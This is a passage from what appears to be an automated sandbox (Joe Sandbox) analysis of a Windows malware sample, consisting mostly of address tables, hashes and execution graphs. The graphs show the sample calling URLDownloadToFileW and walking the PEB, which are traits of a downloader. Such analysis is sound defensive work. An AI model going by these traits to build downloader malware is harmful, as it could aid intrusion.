                        0x03a7a330
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a7a330
                        0x03a7a2d2
                        0x03a7a2d3
                        0x03a7a2d4
                        0x03a7a2db
                        0x03a7a2dc
                        0x03a7a2e1
                        0x03a7a2eb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a7a27c
                        0x03a7a28a
                        0x03a7a38a
                        0x03a7a395
                        0x00000000
                        0x03a7a395
                        0x03a7a290
                        0x03a7a293
                        0x03a7a298
                        0x03a7a298
                        0x03a7a2a1
                        0x03a7a2a6
                        0x03a7a2a6
                        0x03a7a2af
                        0x03a7a2b4
                        0x03a7a2b9
                        0x03a7a2bf
                        0x03a7a2bf
                        0x03a7a128
                        0x03a7a12b
                        0x00000000
                        0x00000000
                        0x03a7a131
                        0x03a79fcd
                        0x03a79fcd
                        0x00000000
                        0x03a79fcd
                        0x03a7a27a
                        0x03a7a223
                        0x00000000
                        0x03a7a223
                        0x03a7a15a
                        0x03a7a164
                        0x03a7a17c
                        0x03a7a17f
                        0x03a7a17f
                        0x03a7a185
                        0x03a7a18d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a7a18d
                        0x03a79e50
                        0x03a79e53
                        0x03a79e56
                        0x03a79fe3
                        0x03a79fe8
                        0x03a79fed
                        0x03a79ff2
                        0x03a79ff5
                        0x03a79ffb
                        0x03a7a022
                        0x03a7a025
                        0x03a7a026
                        0x03a7a027
                        0x03a7a02a
                        0x03a7a036
                        0x03a7a0c4
                        0x03a7a0c7
                        0x03a7a0cc
                        0x03a7a0cc
                        0x03a7a0d5
                        0x03a7a0da
                        0x03a7a0da
                        0x03a7a0e3
                        0x03a7a0e8
                        0x03a7a0ed
                        0x03a7a0ef
                        0x03a7a0ef
                        0x00000000
                        0x03a7a0ed
                        0x03a7a03f
                        0x00000000
                        0x00000000
                        0x03a7a044
                        0x03a7a05f
                        0x03a7a063
                        0x03a7a064
                        0x03a7a067
                        0x03a7a06a
                        0x03a7a075
                        0x00000000
                        0x00000000
                        0x03a7a04b
                        0x03a7a058
                        0x03a7a058
                        0x00000000
                        0x03a7a044
                        0x03a79ffd
                        0x03a7a006
                        0x00000000
                        0x00000000
                        0x03a7a008
                        0x03a7a012
                        0x03a7a017
                        0x03a7a01c
                        0x03a7a0fa
                        0x03a7a0ff
                        0x03a7a0ff
                        0x03a7a108
                        0x03a7a10d
                        0x03a7a10d
                        0x03a7a116
                        0x03a7a11b
                        0x03a7a120
                        0x03a7a122
                        0x03a7a122
                        0x00000000
                        0x03a7a120
                        0x00000000
                        0x03a7a077
                        0x03a7a077
                        0x03a7a07a
                        0x03a7a07d
                        0x03a7a088
                        0x03a7a0b3
                        0x03a7a0b6
                        0x03a7a0b9
                        0x03a7a0bb
                        0x03a7a0be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a7a0be
                        0x03a7a08d
                        0x03a7a096
                        0x03a7a099
                        0x03a7a0a2
                        0x03a7a0a5
                        0x03a7a0ab
                        0x03a7a0b1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a7a0b1
                        0x03a79e5f
                        0x03a79e7f
                        0x03a79e82
                        0x03a79e87
                        0x03a79e87
                        0x03a79e90
                        0x03a79e95
                        0x03a79e95
                        0x03a79e9e
                        0x03a79ea3
                        0x03a79ea8
                        0x03a79eae
                        0x03a79eae
                        0x00000000
                        0x03a79ea8
                        0x03a79e6a
                        0x03a79e75
                        0x03a79e7d
                        0x03a79ebf
                        0x03a79ec8
                        0x03a79ed2
                        0x03a79ed2
                        0x03a79edf
                        0x03a79ef8
                        0x03a79f08
                        0x03a79f11
                        0x03a79f13
                        0x03a79f13
                        0x03a79f35
                        0x03a79f3b
                        0x03a79f3d
                        0x03a79f3d
                        0x03a79f46
                        0x03a79fd8
                        0x03a79fdb
                        0x03a79fe0
                        0x00000000
                        0x03a79f4c
                        0x03a79f55
                        0x03a79f68
                        0x03a79f9a
                        0x03a79f9d
                        0x03a79fa2
                        0x03a79fa2
                        0x03a79fab
                        0x03a79fb0
                        0x03a79fb0
                        0x03a79fb9
                        0x03a79fbe
                        0x03a79fc3
                        0x03a79fc5
                        0x03a79fc5
                        0x03a79fcb
                        0x00000000
                        0x03a79fcb
                        0x03a79f74
                        0x03a79f8c
                        0x03a79f92
                        0x03a79f98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a79f98
                        0x03a79f46
                        0x00000000
                        0x03a79e7d
                        0x03a79e0a
                        0x03a79e10
                        0x03a79e12
                        0x03a79e13
                        0x03a79e18
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03a79e18
                        0x03a79dc5
                        0x03a79dce
                        0x03a79dd3
                        0x03a79dd8
                        0x03a79dde
                        0x03a79dde
                        0x00000000
                        0x03a79dd8
                        0x03a79d92
                        0x03a79d97
                        0x03a79d9c
                        0x03a79da2
                        0x03a79da2
                        0x00000000
                        0x03a79d9c
                        0x03a79ceb
                        0x03a79cee
                        0x03a79cf3
                        0x00000000
                        0x03a79cf3
                        0x03a79cd8
                        0x03a79cd8
                        0x03a79cda
                        0x03a79cda
                        0x03a7a3f7
                        0x03a7a3fb
                        0x03a7a3fb
                        0x03a79cd6

                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.572071981.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, Offset: 03A60000, based on PE: true
                        • Associated: 00000005.00000002.572448936.0000000003A87000.00000020.00000001.00040000.00000000.sdmpDownload File
                        • Associated: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmpDownload File
                        • Associated: 00000005.00000002.572951791.0000000003A9F000.00000040.00000001.00040000.00000000.sdmpDownload File
                        • Associated: 00000005.00000002.573022167.0000000003AA4000.00000040.00000001.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3a60000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)$open
                        • API String ID: 0-860629979
                        • Opcode ID: c59f07edaefc16b95dda7b94eb852f13e4eb506dccd25badd3612739cae4df2e
                        • Instruction ID: 186d29340fd6b5cbc975b50df629c4eaaba13af3a09627988245c3b8c487a83b
                        • Opcode Fuzzy Hash: c59f07edaefc16b95dda7b94eb852f13e4eb506dccd25badd3612739cae4df2e
                        • Instruction Fuzzy Hash: 22323A75901219AFCF21EFA4DC88AEEBBB9EF05701F18445BF505E6254DB348A92CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7.1%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph 25456 3354004 URLDownloadToFileW 25407 1380f5a LdrInitializeThunk 25457 3354876 GetPEB GetPEB 25409 335489c 25412 33548d5 25409->25412 25411 33548c6 25415 33548ec 25412->25415 25413 33548f7 25413->25411 25415->25413 25418 33361e9 25415->25418 25419 33361f8 25418->25419 25426 3336202 25419->25426 25421 3336200 25421->25413 25422 3354963 25421->25422 25424 335496d 25422->25424 25437 333e06b 25424->25437 25425 33549ee 25425->25413 25427 333622b 25426->25427 25432 3355150 25427->25432 25429 333625d 25430 3355150 GetPEB 25429->25430 25431 333626c 25430->25431 25431->25421 25433 335515d 25432->25433 25434 3355161 25432->25434 25433->25429 25435 33551a9 GetPEB 25434->25435 25436 33551c3 25434->25436 25435->25436 25436->25429 25438 333e099 25437->25438 25441 333db20 25438->25441 25440 333e0a9 25440->25425 25442 333db36 25441->25442 25445 333e6a4 25442->25445 25444 333db41 25444->25440 25446 333e6b8 25445->25446 25448 333e720 25446->25448 25449 33351f6 25446->25449 25448->25444 25450 33351fe 25449->25450 25452 333522e 25449->25452 25451 3335215 GetPEB 25450->25451 25450->25452 25451->25452 25452->25448

                        Executed Functions

                        Function 01381FBA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01381CA8 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01381BA2 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01380F5A Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01381996 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph 25419 3b8489c 25422 3b848d5 25419->25422 25421 3b848c6 25423 3b848ec 25422->25423 25424 3b848f7 25423->25424 25428 3b661e9 25423->25428 25424->25421 25429 3b661f8 25428->25429 25436 3b66202 25429->25436 25431 3b66200 25431->25424 25432 3b84963 25431->25432 25434 3b8496d 25432->25434 25447 3b6e06b 25434->25447 25435 3b849ee 25435->25424 25437 3b6622b 25436->25437 25442 3b85150 25437->25442 25439 3b6625d 25440 3b85150 GetPEB 25439->25440 25441 3b6626c 25440->25441 25441->25431 25443 3b8515d 25442->25443 25444 3b85161 25442->25444 25443->25439 25445 3b851a9 GetPEB 25444->25445 25446 3b851c3 25444->25446 25445->25446 25446->25439 25448 3b6e099 25447->25448 25451 3b6db20 25448->25451 25450 3b6e0a9 25450->25435 25452 3b6db36 25451->25452 25455 3b6e6a4 25452->25455 25454 3b6db41 25454->25450 25456 3b6e6b8 25455->25456 25458 3b6e720 25456->25458 25459 3b651f6 25456->25459 25458->25454 25460 3b651fe 25459->25460 25462 3b6522e 25459->25462 25461 3b65215 GetPEB 25460->25461 25460->25462 25461->25462 25462->25458 25465 4000f5a LdrInitializeThunk 25468 3b84004 URLDownloadToFileW 25469 3b84876 GetPEB GetPEB

                        Executed Functions

                        Function 04001996 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04000F5A Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04001BA2 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04001CA8 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04001FBA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%